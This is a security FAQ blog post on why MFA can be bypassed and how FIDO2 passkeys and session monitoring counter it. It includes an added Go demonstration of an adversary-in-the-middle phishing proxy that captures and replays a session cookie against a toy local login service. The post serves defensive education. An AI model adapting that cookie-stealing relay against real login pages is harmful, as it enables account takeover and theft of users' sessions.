MFA protects the authentication moment, not what happens after. Hackers bypass MFA by stealing session tokens and cookies created after successful authentication, using phishing proxies that capture credentials in real-time, or exploiting weak MFA implementations like SMS codes and push notification fatigue.
Pithy Security | Cybersecurity FAQs – The Details
Question: Why does enabling MFA still let hackers bypass my login?
Asked by: Claude Sonnet 4.5
Answered by: Mike D (MrComputerScience) from Pithy Security.
Session Tokens Are The Real Target
MFA validates your identity once, at login. After that succeeds the service issues a session token or cookie, and every later request is authorized by that token alone, with no second MFA prompt. The token is a bearer credential: whoever presents it is treated as the authenticated user, so an attacker who steals it has no MFA left to bypass. Adversary-in-the-middle (AiTM) attacks put a proxy between you and the real login page. You authenticate normally and complete MFA successfully, the proxy forwards everything to the genuine service, and it copies the session cookie out of the response on the way back. The attacker then presents that cookie from their own device, and the service never asks for MFA because the cookie already proves that authentication happened.
AiTM phishing kits such as Evilginx2 and Modlishka automate this. They stand up a convincing lookalike site that relays your password and MFA code to the real service in real time while recording the authenticated session. From the victim's perspective, login works perfectly. From the attacker's perspective, they now hold access that lasts as long as the session stays valid, typically hours to days, and that never triggers MFA again. This is one of the most common ways MFA is defeated in corporate compromises today.
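To make the token theft concrete, here is an added example in Go. It is not code from the original post, and it is not Evilginx2 or Modlishka. It builds a constructed toy identity provider that issues a bearer cookie after password plus TOTP, an Evilginx-style reverse proxy on net/http/httputil that forwards the login untouched and records the Set-Cookie header it passes back, and an attacker who replays that cookie straight at the real service. The user name, password, TOTP value, cookie value and endpoints are made-up test data.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"net/http/httputil"
	"net/url"
	"sync"
)

// Toy identity provider (constructed): password + TOTP checked once, then a bearer cookie.
// Credentials and the cookie value are made-up test data.
func newIdP() *httptest.Server {
	mux := http.NewServeMux()
	mux.HandleFunc("/login", func(w http.ResponseWriter, r *http.Request) {
		if r.FormValue("user") == "alice" && r.FormValue("pass") == "hunter2" && r.FormValue("totp") == "492817" {
			http.SetCookie(w, &http.Cookie{Name: "session", Value: "sess-7f3a9c", HttpOnly: true})
			fmt.Fprint(w, "mfa ok")
			return
		}
		http.Error(w, "denied", http.StatusUnauthorized)
	})
	mux.HandleFunc("/mail", func(w http.ResponseWriter, r *http.Request) {
		// No MFA here: whoever presents the cookie is treated as Alice.
		if c, err := r.Cookie("session"); err != nil || c.Value != "sess-7f3a9c" {
			http.Error(w, "login required", http.StatusUnauthorized)
			return
		}
		fmt.Fprint(w, "inbox for alice")
	})
	return httptest.NewServer(mux)
}

// loot holds the Set-Cookie values the real IdP sent back through the proxy.
type loot struct {
	mu      sync.Mutex
	cookies []*http.Cookie
}

// newPhishingProxy is a minimal Evilginx-style relay: requests go to the genuine IdP
// unchanged (password and TOTP included) and every response is mined for cookies.
func newPhishingProxy(idpURL string, stolen *loot) *httptest.Server {
	target, _ := url.Parse(idpURL)
	rp := httputil.NewSingleHostReverseProxy(target)
	rp.ModifyResponse = func(resp *http.Response) error {
		stolen.mu.Lock()
		defer stolen.mu.Unlock()
		stolen.cookies = append(stolen.cookies, resp.Cookies()...)
		return nil
	}
	return httptest.NewServer(rp)
}

func get(u string, cookies []*http.Cookie) (int, string) {
	req, _ := http.NewRequest(http.MethodGet, u, nil)
	for _, c := range cookies {
		req.AddCookie(c)
	}
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return 0, err.Error()
	}
	defer resp.Body.Close()
	body, _ := io.ReadAll(resp.Body)
	return resp.StatusCode, string(body)
}

type Outcome struct {
	VictimLoginStatus int    // what the victim saw logging in through the lookalike site
	StolenCookies     int    // cookies the proxy captured on the way back
	NoCookieStatus    int    // /mail with no cookie: the gate itself works
	ReplayStatus      int    // /mail from the attacker's machine with only the stolen cookie
	ReplayBody        string
}

// RunAiTM plays the whole exchange: the victim logs in via the proxy, the attacker replays.
func RunAiTM() Outcome {
	idp := newIdP()
	defer idp.Close()
	stolen := &loot{}
	proxy := newPhishingProxy(idp.URL, stolen)
	defer proxy.Close()
	var out Outcome
	resp, err := http.PostForm(proxy.URL+"/login", url.Values{"user": {"alice"}, "pass": {"hunter2"}, "totp": {"492817"}})
	if err == nil {
		resp.Body.Close()
		out.VictimLoginStatus = resp.StatusCode
	}
	stolen.mu.Lock()
	cookies := append([]*http.Cookie(nil), stolen.cookies...)
	stolen.mu.Unlock()
	out.StolenCookies = len(cookies)
	// The attacker talks to the real IdP directly and never sees an MFA prompt.
	out.NoCookieStatus, _ = get(idp.URL+"/mail", nil)
	out.ReplayStatus, out.ReplayBody = get(idp.URL+"/mail", cookies)
	return out
}

func main() {
	fmt.Printf("%+v\n", RunAiTM())
}
```

Running it prints the Outcome: the victim got HTTP 200 through the lookalike site, the proxy holds one cookie, the bare /mail request is refused with 401, and the replayed cookie returns the inbox with no MFA prompt. Nothing in the replayed request distinguishes the attacker from the victim, which is why the fix has to be a credential bound to the origin or detection after the fact.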
Weak MFA Methods Create Easy Targets
Not all MFA provides equal protection. SMS codes are exposed to SIM swapping, where an attacker convinces the mobile carrier to move your number to a device they control and then receives your codes. Push-notification MFA suffers from fatigue attacks, where an attacker who already has your password fires off approval prompts until you tap accept to make them stop. Time-based one-time passwords (TOTP) from authenticator apps can be phished in real time: a relay site forwards the code to the real service within its 30-second step (plus whatever clock tolerance the server allows), which is more than enough time for an automated proxy.
Social engineering remains devastatingly effective. The 2023 MGM ransomware attack started with a phone call to the IT help desk. The attackers impersonated an employee found on LinkedIn, claimed to have lost their phone, and convinced help desk staff to remove MFA from the account. With MFA gone, the credentials they already held granted full access. MGM put the cost at over $100 million. Organizations with weak identity verification for MFA resets face the same risk whichever MFA technology they deploy.
FIDO2 and Passkeys Stop Most Bypass Techniques
Hardware security keys using FIDO2/WebAuthn (YubiKey, Google Titan and similar) provide cryptographic proof of authentication that can't be phished or proxied. Each credential is scoped to the site's domain (the relying party ID), and the browser writes the page's actual origin into the data the key signs. A key registered for example.com will not produce a usable assertion for a lookalike domain, so an AiTM proxy has nothing to relay. There's no code to intercept, no push notification to approve, and no SMS to hijack. Authentication is a challenge-response over a private key that never leaves the device, which proves both possession of the key and that the site asking is the one the credential was created for.
Passkeys are the same FIDO2/WebAuthn credentials stored on a phone or computer instead of a dedicated key, unlocked with the device's biometrics or PIN and, on Apple, Google and Microsoft platforms, synced across a user's devices. The private key still never leaves the device, so there is nothing to phish, and the same origin check defeats proxy attacks. Cloudflare, for example, reported that a 2022 phishing campaign which captured some of its employees' passwords and TOTP codes still gained no access, because the company's mandatory hardware keys would not authenticate to the attacker's lookalike domain.
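The domain binding described above is what a WebAuthn assertion actually carries. The following is an added Go example of mine, not code from the post or from any FIDO vendor. It simulates a P-256 security key registered for the assumed relying party example.com, and the relying party's verification: the browser writes the page origin into clientDataJSON, the authenticator signs that together with a hash of the RP ID, and the server checks challenge, origin, RP ID hash and signature. It then runs a genuine login, a login from the assumed lookalike https://login-example.com that the browser refuses outright, and a relay that skips the browser check, which the server rejects because the signed origin is wrong. The challenge string is a fixed placeholder; a real relying party draws it randomly per login.

```go
package main

import (
	"bytes"
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/json"
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// Relying party settings (assumed values for this example).
const rpID, expectedOrigin = "example.com", "https://example.com"

// clientData is the part of WebAuthn's clientDataJSON that matters here; the browser,
// not the page, fills in Origin with the origin the user is really on.
type clientData struct {
	Type      string `json:"type"`
	Challenge string `json:"challenge"`
	Origin    string `json:"origin"`
}

type Assertion struct {
	AuthData       []byte // rpIdHash(32) || flags(1) || signCount(4)
	ClientDataJSON []byte
	Signature      []byte // ES256 over authData || SHA-256(clientDataJSON)
}

// Authenticator simulates a security key or passkey holding one credential for rpID.
type Authenticator struct{ priv *ecdsa.PrivateKey }

func NewAuthenticator() *Authenticator {
	priv, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	return &Authenticator{priv: priv}
}

// Get models navigator.credentials.get(): the browser refuses unless the page origin is
// rpID or a subdomain of it, so a lookalike domain never obtains a signature at all.
func (a *Authenticator) Get(origin, challenge string) (*Assertion, error) {
	u, err := url.Parse(origin)
	if err != nil {
		return nil, err
	}
	if h := u.Hostname(); h != rpID && !strings.HasSuffix(h, "."+rpID) {
		return nil, fmt.Errorf("browser refused: origin %q is not within RP ID %q", origin, rpID)
	}
	return a.sign(origin, challenge), nil
}

// sign is the raw authenticator step. Calling it directly models a client that skips the
// browser check; the true origin is still baked into what gets signed.
func (a *Authenticator) sign(origin, challenge string) *Assertion {
	cd, _ := json.Marshal(clientData{Type: "webauthn.get", Challenge: challenge, Origin: origin})
	rpHash := sha256.Sum256([]byte(rpID))
	authData := append(rpHash[:], 0x01, 0, 0, 0, 1) // flags: user present; sign count 1
	sig, _ := ecdsa.SignASN1(rand.Reader, a.priv, signedMessage(authData, cd))
	return &Assertion{AuthData: authData, ClientDataJSON: cd, Signature: sig}
}

func signedMessage(authData, clientDataJSON []byte) []byte {
	cdHash := sha256.Sum256(clientDataJSON)
	msg := sha256.Sum256(append(append([]byte{}, authData...), cdHash[:]...))
	return msg[:]
}

// Verify is the relying party's side: ceremony type, challenge, origin, RP ID, signature.
func Verify(pub *ecdsa.PublicKey, challenge string, as *Assertion) error {
	var cd clientData
	if err := json.Unmarshal(as.ClientDataJSON, &cd); err != nil {
		return err
	}
	if cd.Type != "webauthn.get" || cd.Challenge != challenge {
		return errors.New("wrong ceremony type or stale challenge")
	}
	if cd.Origin != expectedOrigin {
		return fmt.Errorf("origin mismatch: assertion was signed for %q", cd.Origin)
	}
	if want := sha256.Sum256([]byte(rpID)); len(as.AuthData) != 37 || !bytes.Equal(as.AuthData[:32], want[:]) {
		return errors.New("rpIdHash mismatch")
	}
	if !ecdsa.VerifyASN1(pub, signedMessage(as.AuthData, as.ClientDataJSON), as.Signature) {
		return errors.New("bad signature")
	}
	return nil
}

// Scenarios: a genuine login, a lookalike login the browser blocks, and a relay that
// skips the browser check. Only the first verifies.
func Scenarios() (genuine, lookalike, relayed error) {
	auth := NewAuthenticator()
	pub := &auth.priv.PublicKey
	const challenge = "Y2hhbGxlbmdlLWZyb20tdGhlLXJw" // placeholder; the RP draws this fresh per login
	as, err := auth.Get(expectedOrigin, challenge)
	if err != nil {
		return err, nil, nil
	}
	genuine = Verify(pub, challenge, as)
	_, lookalike = auth.Get("https://login-example.com", challenge)
	relayed = Verify(pub, challenge, auth.sign("https://login-example.com", challenge))
	return genuine, lookalike, relayed
}
```

The relay case is the AiTM proxy's best effort: even with a client that ignores the browser's RP ID check, the origin it was really on is inside the signed bytes, so the assertion is useless at example.com, and without the private key it cannot be rewritten.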
What This Means For You
- Replace SMS-based MFA with authenticator apps now: SIM swapping costs attackers little and succeeds routinely, and the carrier's procedures are not something you control.
- Deploy hardware security keys or passkeys for high-value accounts like email, banking, and admin access where compromise creates maximum damage.
- Monitor for post-authentication anomalies that point to a stolen session: the same session used from a new device or IP address shortly after login, bulk data downloads, or new OAuth app authorizations.
- Train help desk staff on social engineering tactics and implement strict identity verification procedures before processing any MFA reset requests.
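For the monitoring item, here is an added Go example (mine, not from the post) that runs three of those checks over constructed audit-log lines: a session id reappearing from a new IP address and user agent after an MFA login, a session crossing a bulk-download threshold, and an OAuth consent granted from a session that has already changed device. The log format, field names, addresses, user names and the 500 MiB threshold are assumptions for the example.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// Constructed audit-log lines (assumed format). Alice logs in with MFA from her laptop;
// nine minutes later her session id shows up from a different address and browser, pulls a
// large export, and grants an OAuth app. Bob is an ordinary user for contrast.
var sampleLog = []string{
	"2024-05-02T10:01:07Z session=sess-7f3a9c user=alice ip=203.0.113.10 ua=Chrome124-Win action=login mfa=ok",
	"2024-05-02T10:02:15Z session=sess-7f3a9c user=alice ip=203.0.113.10 ua=Chrome124-Win action=mail.read",
	"2024-05-02T10:09:41Z session=sess-7f3a9c user=alice ip=198.51.100.77 ua=Firefox125-Linux action=mail.read",
	"2024-05-02T10:10:03Z session=sess-7f3a9c user=alice ip=198.51.100.77 ua=Firefox125-Linux action=file.download bytes=734003200",
	"2024-05-02T10:10:52Z session=sess-7f3a9c user=alice ip=198.51.100.77 ua=Firefox125-Linux action=oauth.consent app=MailSyncPro",
	"2024-05-02T10:12:00Z session=sess-11b2e0 user=bob ip=192.0.2.44 ua=Safari17-Mac action=login mfa=ok",
	"2024-05-02T10:15:30Z session=sess-11b2e0 user=bob ip=192.0.2.44 ua=Safari17-Mac action=file.download bytes=2048000",
}

const bulkDownloadBytes = 500 * 1024 * 1024 // assumed threshold per session; tune per environment

type event struct {
	ts     string
	fields map[string]string
}

// parseLine reads "<timestamp> key=value key=value ..." into an event.
func parseLine(line string) event {
	parts := strings.Fields(line)
	ev := event{ts: parts[0], fields: map[string]string{}}
	for _, kv := range parts[1:] {
		if p := strings.SplitN(kv, "=", 2); len(p) == 2 {
			ev.fields[p[0]] = p[1]
		}
	}
	return ev
}

type sessionState struct {
	user, ip, ua string // device that completed MFA when the session was first seen
	downloaded   int64
	deviceMoved  bool
}

// Detect flags three post-authentication signals: a session token reused from a new
// IP/user-agent pair, cumulative downloads past the threshold, and OAuth consent from a
// session that has already moved device.
func Detect(lines []string) []string {
	var alerts []string
	sessions := map[string]*sessionState{}
	for _, line := range lines {
		ev := parseLine(line)
		id := ev.fields["session"]
		st, seen := sessions[id]
		if !seen {
			st = &sessionState{user: ev.fields["user"], ip: ev.fields["ip"], ua: ev.fields["ua"]}
			sessions[id] = st
		}
		if !st.deviceMoved && (ev.fields["ip"] != st.ip || ev.fields["ua"] != st.ua) {
			st.deviceMoved = true
			alerts = append(alerts, fmt.Sprintf("%s %s: session %s issued to %s/%s now used from %s/%s (possible stolen token)",
				ev.ts, st.user, id, st.ip, st.ua, ev.fields["ip"], ev.fields["ua"]))
		}
		switch ev.fields["action"] {
		case "file.download":
			n, _ := strconv.ParseInt(ev.fields["bytes"], 10, 64)
			before := st.downloaded
			st.downloaded += n
			if before <= bulkDownloadBytes && st.downloaded > bulkDownloadBytes {
				alerts = append(alerts, fmt.Sprintf("%s %s: session %s has downloaded %d bytes (bulk export)", ev.ts, st.user, id, st.downloaded))
			}
		case "oauth.consent":
			if st.deviceMoved {
				alerts = append(alerts, fmt.Sprintf("%s %s: OAuth grant to %s from a session that changed device (persistence attempt)", ev.ts, st.user, ev.fields["app"]))
			}
		}
	}
	return alerts
}

func main() {
	for _, a := range Detect(sampleLog) {
		fmt.Println("ALERT", a)
	}
}
```

On the sample log this raises exactly three alerts, all for Alice's session, and none for Bob. The first sighting of a session binds it to the device that passed MFA; a later request from a different address and browser is the fingerprint of a replayed cookie, and the follow-on export and OAuth grant are what an attacker does with it.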
You’re reading Ask Pithy Security. Got a question? Email ask@pithysecurity.com (include your Substack pub URL for a free backlink).